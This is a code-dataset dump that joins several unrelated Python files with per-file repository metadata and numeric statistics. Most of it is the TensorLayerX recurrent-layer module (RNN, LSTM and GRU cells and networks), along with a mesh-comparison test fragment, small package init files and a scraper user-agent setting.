reconstructor.samplesAlongPCAModes(worldParticles)
baselineDenseMesh1 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/tps_mode-00_sample-000_dense.vtk")
baselineDenseMesh2 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/tps_mode-00_sample-001_dense.vtk")
baselineDenseMesh3 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/tps_mode-00_sample-002_dense.vtk")
denseMesh1 = Mesh("mode-00/tps_mode-00_sample-000_dense.vtk")
denseMesh2 = Mesh("mode-00/tps_mode-00_sample-001_dense.vtk")
denseMesh3 = Mesh("mode-00/tps_mode-00_sample-002_dense.vtk")
success = True
print("comparing dense mesh 1...")
success = baselineDenseMesh1 == denseMesh1
print("comparing dense mesh 2...")
success = success and baselineDenseMesh2 == denseMesh2
print("comparing dense mesh 3...")
success = success and baselineDenseMesh3 == denseMesh3
return success
success &= utils.test(pcamodesTestThinPlateSpline)
sys.exit(not success)
| 41.797619 | 109 | 0.767588 | 390 | 3,511 | 6.751282 | 0.179487 | 0.061527 | 0.088872 | 0.066084 | 0.886821 | 0.842765 | 0.842765 | 0.817319 | 0.817319 | 0.817319 | 0 | 0.039582 | 0.100541 | 3,511 | 83 | 110 | 42.301205 | 0.794174 | 0 | 0 | 0.597015 | 0 | 0 | 0.324124 | 0.223013 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.044776 | 0 | 0.104478 | 0.119403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
14fe617ac4b729b9aa7373e147ec9db32786a586 | 167 | py | Python | kwat/matrix_factorization/__init__.py | KwatME/ccal | d96dfa811482eee067f346386a2181ec514625f4 | [
"MIT"
] | 5 | 2017-05-05T17:50:28.000Z | 2019-01-30T19:23:02.000Z | kwat/matrix_factorization/__init__.py | KwatME/ccal | d96dfa811482eee067f346386a2181ec514625f4 | [
"MIT"
] | 5 | 2017-05-05T01:52:31.000Z | 2019-04-20T21:06:05.000Z | kwat/matrix_factorization/__init__.py | KwatME/ccal | d96dfa811482eee067f346386a2181ec514625f4 | [
"MIT"
] | 5 | 2017-07-17T18:55:54.000Z | 2019-02-02T04:46:19.000Z | from .factorize import factorize
from .factorize_with_nmf import factorize_with_nmf
from .make_label import make_label
from .plot import plot
from .solve import solve
| 27.833333 | 50 | 0.850299 | 26 | 167 | 5.230769 | 0.346154 | 0.191176 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11976 | 167 | 5 | 51 | 33.4 | 0.92517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0921b8ddc77f0aed620a294e7b6682b1504d628c | 28,281 | py | Python | tensorlayerx/nn/layers/recurrent.py | tensorlayer/TensorLayerX | 4e3e6f13687309dda7787f0b86e35a62bb3adbad | [
"Apache-2.0"
] | 34 | 2021-12-03T08:19:23.000Z | 2022-03-13T08:34:34.000Z | tensorlayerx/nn/layers/recurrent.py | tensorlayer/TensorLayerX | 4e3e6f13687309dda7787f0b86e35a62bb3adbad | [
"Apache-2.0"
] | null | null | null | tensorlayerx/nn/layers/recurrent.py | tensorlayer/TensorLayerX | 4e3e6f13687309dda7787f0b86e35a62bb3adbad | [
"Apache-2.0"
] | 3 | 2021-12-28T16:57:20.000Z | 2022-03-18T02:23:14.000Z | #! /usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
import tensorlayerx as tlx
from tensorlayerx import logging
from tensorlayerx.nn.core import Module
__all__ = [
'RNN',
'RNNCell',
'GRU',
'LSTM',
'GRUCell',
'LSTMCell',
]
class RNNCell(Module):
"""An Elman RNN cell with tanh or ReLU non-linearity.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
act : activation function
The non-linearity to use. Can be either 'tanh' or 'relu'. Default: 'tanh'
name : None or str
A unique layer name
Returns
----------
outputs : tensor
A tensor with shape `[batch_size, hidden_size]`.
states : tensor
A tensor with shape `[batch_size, hidden_size]`.
Tensor containing the next hidden state for each element in the batch
"""
def __init__(
self,
input_size,
hidden_size,
bias=True,
act='tanh',
name=None,
):
super(RNNCell, self).__init__(name)
self.input_size = input_size
self.hidden_size = hidden_size
self.bias = bias
if act not in ('relu', 'tanh'):
raise ValueError("Activation should be 'tanh' or 'relu'.")
self.act = act
self.build(None)
logging.info("RNNCell %s: input_size: %d hidden_size: %d act: %s" % (self.name, input_size, hidden_size, act))
def __repr__(self):
actstr = self.act
s = ('{classname}(input_size={input_size}, hidden_size={hidden_size}')
s += ', bias=True' if self.bias else ', bias=False'
s += (',' + actstr)
if self.name is not None:
s += ', name=\'{name}\''
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def check_input(self, input_shape):
if input_shape[1] != self.input_size:
raise ValueError(
'input should have consistent input_size. But got {}, expected {}'.format(
input_shape[1], self.input_size
)
)
def check_hidden(self, input_shape, h_shape, hidden_label):
if input_shape[0] != h_shape[0]:
raise ValueError(
'input batch size{} should match hidden{} batch size{}.'.format(
input_shape[0], hidden_label, h_shape[0]
)
)
if h_shape[1] != self.hidden_size:
raise ValueError(
'hidden{} should have consistent hidden_size. But got {}, expected {}.'.format(
hidden_label, h_shape[1], self.hidden_size
)
)
def build(self, inputs_shape):
stdv = 1.0 / np.sqrt(self.hidden_size)
_init = tlx.nn.initializers.RandomUniform(minval=-stdv, maxval=stdv)
self.weight_ih_shape = (self.hidden_size, self.input_size)
self.weight_hh_shape = (self.hidden_size, self.hidden_size)
self.weight_ih = self._get_weights("weight_ih", shape=self.weight_ih_shape, init=_init)
self.weight_hh = self._get_weights("weight_hh", shape=self.weight_hh_shape, init=_init)
if self.bias:
self.bias_ih_shape = (self.hidden_size, )
self.bias_hh_shape = (self.hidden_size, )
self.bias_ih = self._get_weights('bias_ih', shape=self.bias_ih_shape, init=_init)
self.bias_hh = self._get_weights('bias_hh', shape=self.bias_hh_shape, init=_init)
else:
self.bias_ih = None
self.bias_hh = None
self.rnncell = tlx.ops.rnncell(
weight_ih=self.weight_ih, weight_hh=self.weight_hh, bias_ih=self.bias_ih, bias_hh=self.bias_hh, act=self.act
)
def forward(self, inputs, states=None):
"""
Parameters
----------
inputs : tensor
A tensor with shape `[batch_size, input_size]`.
states : tensor or None
A tensor with shape `[batch_size, hidden_size]`. When states is None, zero state is used. Defaults to None.
Examples
--------
With TensorLayerx
>>> input = tlx.nn.Input([4, 16], name='input')
>>> prev_h = tlx.nn.Input([4,32])
>>> cell = tlx.nn.RNNCell(input_size=16, hidden_size=32, bias=True, act='tanh', name='rnncell_1')
>>> y, h = cell(input, prev_h)
>>> print(y.shape)
"""
input_shape = tlx.get_tensor_shape(inputs)
self.check_input(input_shape)
if states is None:
states = tlx.zeros(shape=(input_shape[0], self.hidden_size), dtype=inputs.dtype)
states_shape = tlx.get_tensor_shape(states)
self.check_hidden(input_shape, states_shape, hidden_label='h')
output, states = self.rnncell(inputs, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(inputs, [output, states])
self._nodes_fixed = True
return output, states
class LSTMCell(Module):
"""A long short-term memory (LSTM) cell.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
name : None or str
A unique layer name
Returns
----------
outputs : tensor
A tensor with shape `[batch_size, hidden_size]`.
states : tensor
A tuple of two tensor `(h, c)`, each of shape `[batch_size, hidden_size]`.
Tensors containing the next hidden state and next cell state for each element in the batch.
"""
def __init__(
self,
input_size,
hidden_size,
bias=True,
name=None,
):
super(LSTMCell, self).__init__(name)
self.input_size = input_size
self.hidden_size = hidden_size
self.bias = bias
self.build(None)
logging.info("LSTMCell %s: input_size: %d hidden_size: %d " % (self.name, input_size, hidden_size))
def __repr__(self):
s = ('{classname}(input_size={input_size}, hidden_size={hidden_size}')
s += ', bias=True' if self.bias else ', bias=False'
if self.name is not None:
s += ', name=\'{name}\''
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def check_input(self, input_shape):
if input_shape[1] != self.input_size:
raise ValueError(
'input should have consistent input_size. But got {}, expected {}'.format(
input_shape[1], self.input_size
)
)
def check_hidden(self, input_shape, h_shape, hidden_label):
if input_shape[0] != h_shape[0]:
raise ValueError(
'input batch size{} should match hidden{} batch size{}.'.format(
input_shape[0], hidden_label, h_shape[0]
)
)
if h_shape[1] != self.hidden_size:
raise ValueError(
'hidden{} should have consistent hidden_size. But got {}, expected {}.'.format(
hidden_label, h_shape[1], self.hidden_size
)
)
def build(self, inputs_shape):
stdv = 1.0 / np.sqrt(self.hidden_size)
_init = tlx.nn.initializers.RandomUniform(minval=-stdv, maxval=stdv)
self.weight_ih_shape = (4 * self.hidden_size, self.input_size)
self.weight_hh_shape = (4 * self.hidden_size, self.hidden_size)
self.weight_ih = self._get_weights("weight_ih", shape=self.weight_ih_shape, init=_init)
self.weight_hh = self._get_weights("weight_hh", shape=self.weight_hh_shape, init=_init)
if self.bias:
self.bias_ih_shape = (4 * self.hidden_size, )
self.bias_hh_shape = (4 * self.hidden_size, )
self.bias_ih = self._get_weights('bias_ih', shape=self.bias_ih_shape, init=_init)
self.bias_hh = self._get_weights('bias_hh', shape=self.bias_hh_shape, init=_init)
else:
self.bias_ih = None
self.bias_hh = None
self.lstmcell = tlx.ops.lstmcell(
weight_ih=self.weight_ih, weight_hh=self.weight_hh, bias_ih=self.bias_ih, bias_hh=self.bias_hh
)
def forward(self, inputs, states=None):
"""
Parameters
----------
inputs : tensor
A tensor with shape `[batch_size, input_size]`.
states : tuple or None
A tuple of two tensor `(h, c)`, each of shape `[batch_size, hidden_size]`. When states is None, zero state is used. Defaults: None.
Examples
--------
With TensorLayerx
>>> input = tlx.nn.Input([4, 16], name='input')
>>> prev_h = tlx.nn.Input([4,32])
>>> prev_c = tlx.nn.Input([4,32])
>>> cell = tlx.nn.LSTMCell(input_size=16, hidden_size=32, bias=True, name='lstmcell_1')
>>> y, (h, c)= cell(input, (prev_h, prev_c))
>>> print(y.shape)
"""
input_shape = tlx.get_tensor_shape(inputs)
self.check_input(input_shape)
if states is not None:
h, c = states
else:
h = tlx.zeros(shape=(input_shape[0], self.hidden_size), dtype=inputs.dtype)
c = tlx.zeros(shape=(input_shape[0], self.hidden_size), dtype=inputs.dtype)
h_shape = tlx.get_tensor_shape(h)
c_shape = tlx.get_tensor_shape(c)
self.check_hidden(input_shape, h_shape, hidden_label='h')
self.check_hidden(input_shape, c_shape, hidden_label='c')
output, new_h, new_c = self.lstmcell(inputs, h, c)
if not self._nodes_fixed and self._build_graph:
self._add_node(inputs, [output, new_h, new_c])
self._nodes_fixed = True
return output, (new_h, new_c)
class GRUCell(Module):
"""A gated recurrent unit (GRU) cell.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
name : None or str
A unique layer name
Returns
----------
outputs : tensor
A tensor with shape `[batch_size, hidden_size]`.
states : tensor
A tensor with shape `[batch_size, hidden_size]`.
Tensor containing the next hidden state for each element in the batch
"""
def __init__(
self,
input_size,
hidden_size,
bias=True,
name=None,
):
super(GRUCell, self).__init__(name)
self.input_size = input_size
self.hidden_size = hidden_size
self.bias = bias
self.build(None)
logging.info("GRUCell %s: input_size: %d hidden_size: %d " % (self.name, input_size, hidden_size))
def __repr__(self):
s = ('{classname}(input_size={input_size}, hidden_size={hidden_size}')
s += ', bias=True' if self.bias else ', bias=False'
if self.name is not None:
s += ', name=\'{name}\''
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def check_input(self, input_shape):
if input_shape[1] != self.input_size:
raise ValueError(
'input should have consistent input_size. But got {}, expected {}'.format(
input_shape[1], self.input_size
)
)
def check_hidden(self, input_shape, h_shape, hidden_label):
if input_shape[0] != h_shape[0]:
raise ValueError(
'input batch size{} should match hidden{} batch size{}.'.format(
input_shape[0], hidden_label, h_shape[0]
)
)
if h_shape[1] != self.hidden_size:
raise ValueError(
'hidden{} should have consistent hidden_size. But got {}, expected {}.'.format(
hidden_label, h_shape[1], self.hidden_size
)
)
def build(self, inputs_shape):
stdv = 1.0 / np.sqrt(self.hidden_size)
_init = tlx.nn.initializers.RandomUniform(minval=-stdv, maxval=stdv)
self.weight_ih_shape = (3 * self.hidden_size, self.input_size)
self.weight_hh_shape = (3 * self.hidden_size, self.hidden_size)
self.weight_ih = self._get_weights("weight_ih", shape=self.weight_ih_shape, init=_init)
self.weight_hh = self._get_weights("weight_hh", shape=self.weight_hh_shape, init=_init)
if self.bias:
self.bias_ih_shape = (3 * self.hidden_size, )
self.bias_hh_shape = (3 * self.hidden_size, )
self.bias_ih = self._get_weights('bias_ih', shape=self.bias_ih_shape, init=_init)
self.bias_hh = self._get_weights('bias_hh', shape=self.bias_hh_shape, init=_init)
else:
self.bias_ih = None
self.bias_hh = None
self.grucell = tlx.ops.grucell(
weight_ih=self.weight_ih, weight_hh=self.weight_hh, bias_ih=self.bias_ih, bias_hh=self.bias_hh
)
def forward(self, inputs, states=None):
"""
Parameters
----------
inputs : tensor
A tensor with shape `[batch_size, input_size]`.
states : tensor or None
A tensor with shape `[batch_size, hidden_size]`. When states is None, zero state is used. Defaults: `None`.
Examples
--------
With TensorLayerx
>>> input = tlx.nn.Input([4, 16], name='input')
>>> prev_h = tlx.nn.Input([4,32])
>>> cell = tlx.nn.GRUCell(input_size=16, hidden_size=32, bias=True, name='grucell_1')
>>> y, h= cell(input, prev_h)
>>> print(y.shape)
"""
input_shape = tlx.get_tensor_shape(inputs)
self.check_input(input_shape)
if states is None:
states = tlx.zeros(shape=(input_shape[0], self.hidden_size), dtype=inputs.dtype)
states_shape = tlx.get_tensor_shape(states)
self.check_hidden(input_shape, states_shape, hidden_label='h')
output, states = self.grucell(inputs, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(inputs, [output, states])
self._nodes_fixed = True
return output, states
class RNNBase(Module):
"""
RNNBase class for RNN networks. It provides `forward` and other common methods for RNN, LSTM and GRU.
"""
def __init__(
self,
mode,
input_size,
hidden_size,
num_layers=1,
bias=True,
batch_first=False,
dropout=0.0,
bidirectional=False,
name=None,
):
super(RNNBase, self).__init__(name)
self.mode = mode
self.input_size = input_size
self.hidden_size = hidden_size
self.num_layers = num_layers
self.bias = bias
self.batch_first = batch_first
self.dropout = dropout
self.bidirectional = bidirectional
self.build(None)
logging.info(
"%s: %s: input_size: %d hidden_size: %d num_layers: %d " %
(self.mode, self.name, input_size, hidden_size, num_layers)
)
def __repr__(self):
s = (
'{classname}(input_size={input_size}, hidden_size={hidden_size}, num_layers={num_layers}'
', dropout={dropout}'
)
s += ', bias=True' if self.bias else ', bias=False'
s += ', bidirectional=True' if self.bidirectional else ', bidirectional=False'
if self.name is not None:
s += ', name=\'{name}\''
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def build(self, inputs_shape):
bidirect = 2 if self.bidirectional else 1
self.w_ih = []
self.w_hh = []
self.b_ih = []
self.b_hh = []
stdv = 1.0 / np.sqrt(self.hidden_size)
_init = tlx.nn.initializers.RandomUniform(minval=-stdv, maxval=stdv)
if self.mode == 'LSTM':
gate_size = 4 * self.hidden_size
elif self.mode == 'GRU':
gate_size = 3 * self.hidden_size
else:
gate_size = self.hidden_size
for layer in range(self.num_layers):
for direction in range(bidirect):
layer_input_size = self.input_size if layer == 0 else self.hidden_size * bidirect
suffix = '_reverse' if direction == 1 else ''
self.w_ih.append(
self._get_weights(
var_name='weight_ih_l{}{}'.format(layer, suffix), shape=(gate_size, layer_input_size),
init=_init
)
)
self.w_hh.append(
self._get_weights(
var_name='weight_hh_l{}{}'.format(layer, suffix), shape=(gate_size, self.hidden_size),
init=_init
)
)
if self.bias:
self.b_ih.append(
self._get_weights(
var_name='bias_ih_l{}{}'.format(layer, suffix), shape=(gate_size, ), init=_init
)
)
self.b_hh.append(
self._get_weights(
var_name='bias_hh_l{}{}'.format(layer, suffix), shape=(gate_size, ), init=_init
)
)
self.rnn = tlx.ops.rnnbase(
mode=self.mode, input_size=self.input_size, hidden_size=self.hidden_size, num_layers=self.num_layers,
bias=self.bias, batch_first=self.batch_first, dropout=self.dropout, bidirectional=self.bidirectional,
is_train=self.is_train, w_ih=self.w_ih, w_hh=self.w_hh, b_ih=self.b_ih, b_hh=self.b_hh
)
def forward(self, input, states=None):
output, new_states = self.rnn(input, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(input, [output, new_states])
self._nodes_fixed = True
return output, new_states
class RNN(RNNBase):
"""Multilayer Elman network(RNN). It takes input sequences and initial
states as inputs, and returns the output sequences and the final states.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
num_layers : int
Number of recurrent layers. Default: 1
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
batch_first : bool
If ``True``, then the input and output tensors are provided as `[batch_size, seq, input_size]`, Default: ``False``
dropout : float
If non-zero, introduces a `Dropout` layer on the outputs of each RNN layer except the last layer,
with dropout probability equal to `dropout`. Default: 0
bidirectional : bool
If ``True``, becomes a bidirectional RNN. Default: ``False``
act : activation function
The non-linearity to use. Can be either 'tanh' or 'relu'. Default: 'tanh'
name : None or str
A unique layer name
Returns
----------
outputs : tensor
the output sequence. if `batch_first` is True, the shape is `[batch_size, seq, num_directions * hidden_size]`,
else, the shape is `[seq, batch_size, num_directions * hidden_size]`.
final_states : tensor
final states. The shape is `[num_layers * num_directions, batch_size, hidden_size]`. Note that if the RNN is Bidirectional, the forward states are (0,2,4,6,...) and
the backward states are (1,3,5,7,....).
"""
def __init__(
self,
input_size,
hidden_size,
num_layers=1,
bias=True,
batch_first=False,
dropout=0.0,
bidirectional=False,
act='tanh',
name=None,
):
if act == 'tanh':
mode = 'RNN_TANH'
elif act == 'relu':
mode = 'RNN_RELU'
else:
raise ValueError("act should be in ['tanh', 'relu'], but got {}.".format(act))
super(RNN, self
).__init__(mode, input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, name)
def forward(self, input, states=None):
"""
Parameters
----------
inputs : tensor
the input sequence. if `batch_first` is True, the shape is `[batch_size, seq, input_size]`, else, the shape is `[seq, batch_size, input_size]`.
initial_states : tensor or None
the initial states. The shape is `[num_layers * num_directions, batch_size, hidden_size]`.If initial_state is not given, zero initial states are used.
If the RNN is Bidirectional, num_directions should be 2, else it should be 1. Default: None.
Examples
--------
With TensorLayer
>>> input = tlx.nn.Input([23, 32, 16], name='input')
>>> prev_h = tlx.nn.Input([4, 32, 32])
>>> cell = tlx.nn.RNN(input_size=16, hidden_size=32, bias=True, num_layers=2, bidirectional = True, act='tanh', batch_first=False, dropout=0, name='rnn_1')
>>> y, h= cell(input, prev_h)
>>> print(y.shape)
"""
output, new_states = self.rnn(input, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(input, [output, new_states])
self._nodes_fixed = True
return output, new_states
class LSTM(RNNBase):
"""Applies a multi-layer long short-term memory (LSTM) RNN to an input sequence.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
num_layers : int
Number of recurrent layers. Default: 1
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
batch_first : bool
If ``True``, then the input and output tensors are provided as `[batch_size, seq, input_size]`, Default: ``False``
dropout : float
If non-zero, introduces a `Dropout` layer on the outputs of each LSTM layer except the last layer,
with dropout probability equal to `dropout`. Default: 0
bidirectional : bool
If ``True``, becomes a bidirectional LSTM. Default: ``False``
name : None or str
A unique layer name
Returns
----------
outputs : tensor
the output sequence. if `batch_first` is True, the shape is `[batch_size, seq, num_directions * hidden_size]`,
else, the shape is `[seq, batch_size, num_directions * hidden_size]`.
final_states : tensor
final states. A tuple of two tensor. The shape of each is `[num_layers * num_directions, batch_size, hidden_size]`. Note that if the LSTM is Bidirectional, the forward states are (0,2,4,6,...) and
the backward states are (1,3,5,7,....).
"""
def __init__(
self,
input_size,
hidden_size,
num_layers=1,
bias=True,
batch_first=False,
dropout=0.0,
bidirectional=False,
name=None,
):
super(LSTM, self
).__init__('LSTM', input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, name)
def forward(self, input, states=None):
"""
Parameters
----------
inputs : tensor
the input sequence. if `batch_first` is True, the shape is `[batch_size, seq, input_size]`, else, the shape is `[seq, batch_size, input_size]`.
initial_states : tensor or None
the initial states. A tuple of tensor (h, c), the shape of each is `[num_layers * num_directions, batch_size, hidden_size]`.If initial_state is not given, zero initial states are used.
If the LSTM is Bidirectional, num_directions should be 2, else it should be 1. Default: None.
Examples
--------
With TensorLayerx
>>> input = tlx.nn.Input([23, 32, 16], name='input')
>>> prev_h = tlx.nn.Input([4, 32, 32])
>>> prev_c = tlx.nn.Input([4, 32, 32])
>>> cell = tlx.nn.LSTM(input_size=16, hidden_size=32, bias=True, num_layers=2, bidirectional = True, batch_first=False, dropout=0, name='lstm_1')
>>> y, (h, c)= cell(input, (prev_h, prev_c))
>>> print(y.shape)
"""
output, new_states = self.rnn(input, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(input, [output, new_states])
self._nodes_fixed = True
return output, new_states
class GRU(RNNBase):
"""Applies a multi-layer gated recurrent unit (GRU) RNN to an input sequence.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
num_layers : int
Number of recurrent layers. Default: 1
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
batch_first : bool
If ``True``, then the input and output tensors are provided as `[batch_size, seq, input_size]`, Default: ``False``
dropout : float
If non-zero, introduces a `Dropout` layer on the outputs of each GRU layer except the last layer,
with dropout probability equal to `dropout`. Default: 0
bidirectional : bool
If ``True``, becomes a bidirectional LSTM. Default: ``False``
name : None or str
A unique layer name
Returns
----------
outputs : tensor
the output sequence. if `batch_first` is True, the shape is `[batch_size, seq, num_directions * hidden_size]`,
else, the shape is `[seq, batch_size, num_directions * hidden_size]`.
final_states : tensor
final states. A tuple of two tensor. The shape of each is `[num_layers * num_directions, batch_size, hidden_size]`. Note that if the GRU is Bidirectional, the forward states are (0,2,4,6,...) and
the backward states are (1,3,5,7,....).
"""
def __init__(
self,
input_size,
hidden_size,
num_layers=1,
bias=True,
batch_first=False,
dropout=0.0,
bidirectional=False,
name=None,
):
super(GRU, self
).__init__('GRU', input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, name)
def forward(self, input, states=None):
"""
Parameters
----------
inputs : tensor
the input sequence. if `batch_first` is True, the shape is `[batch_size, seq, input_size]`, else, the shape is `[seq, batch_size, input_size]`.
initial_states : tensor or None
the initial states. A tuple of tensor (h, c), the shape of each is `[num_layers * num_directions, batch_size, hidden_size]`.If initial_state is not given, zero initial states are used.
If the GRU is Bidirectional, num_directions should be 2, else it should be 1. Default: None.
Examples
--------
With TensorLayerx
>>> input = tlx.nn.Input([23, 32, 16], name='input')
>>> prev_h = tlx.nn.Input([4, 32, 32])
>>> cell = tlx.nn.GRU(input_size=16, hidden_size=32, bias=True, num_layers=2, bidirectional = True, batch_first=False, dropout=0, name='GRU_1')
>>> y, h= cell(input, prev_h)
>>> print(y.shape)
"""
output, new_states = self.rnn(input, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(input, [output, new_states])
self._nodes_fixed = True
return output, new_states
| 37.557769 | 204 | 0.5893 | 3,703 | 28,281 | 4.280313 | 0.057791 | 0.066877 | 0.037098 | 0.022776 | 0.883407 | 0.855899 | 0.843659 | 0.823722 | 0.815331 | 0.809401 | 0 | 0.009726 | 0.294721 | 28,281 | 752 | 205 | 37.607713 | 0.784919 | 0.363353 | 0 | 0.638677 | 0 | 0 | 0.09378 | 0.016184 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071247 | false | 0 | 0.010178 | 0 | 0.127226 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0939ebe10a7ad532814cbbe942d4b021515f7d93 | 25 | py | Python | regme/models.py | lig/regme | 5fd9616c67761b4f78cf90fa3355c12643b74b28 | [
"Apache-2.0"
] | 7 | 2015-02-13T19:10:59.000Z | 2021-07-17T01:37:52.000Z | regme/models.py | lig/regme | 5fd9616c67761b4f78cf90fa3355c12643b74b28 | [
"Apache-2.0"
] | null | null | null | regme/models.py | lig/regme | 5fd9616c67761b4f78cf90fa3355c12643b74b28 | [
"Apache-2.0"
] | 3 | 2015-01-27T06:29:35.000Z | 2017-02-11T17:35:23.000Z | from .documents import *
| 12.5 | 24 | 0.76 | 3 | 25 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1189a11ba876b35d3fe6a724251af9c076c08bf5 | 131 | py | Python | backend/scraper/settings.py | eladgubkin/MyGuitarTabs | 74e524750c2de658874a138d0540abc8143a2c6d | [
"MIT"
] | null | null | null | backend/scraper/settings.py | eladgubkin/MyGuitarTabs | 74e524750c2de658874a138d0540abc8143a2c6d | [
"MIT"
] | null | null | null | backend/scraper/settings.py | eladgubkin/MyGuitarTabs | 74e524750c2de658874a138d0540abc8143a2c6d | [
"MIT"
] | null | null | null | USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
| 65.5 | 130 | 0.732824 | 25 | 131 | 3.8 | 0.84 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.247863 | 0.10687 | 131 | 1 | 131 | 131 | 0.564103 | 0 | 0 | 0 | 0 | 1 | 0.877863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.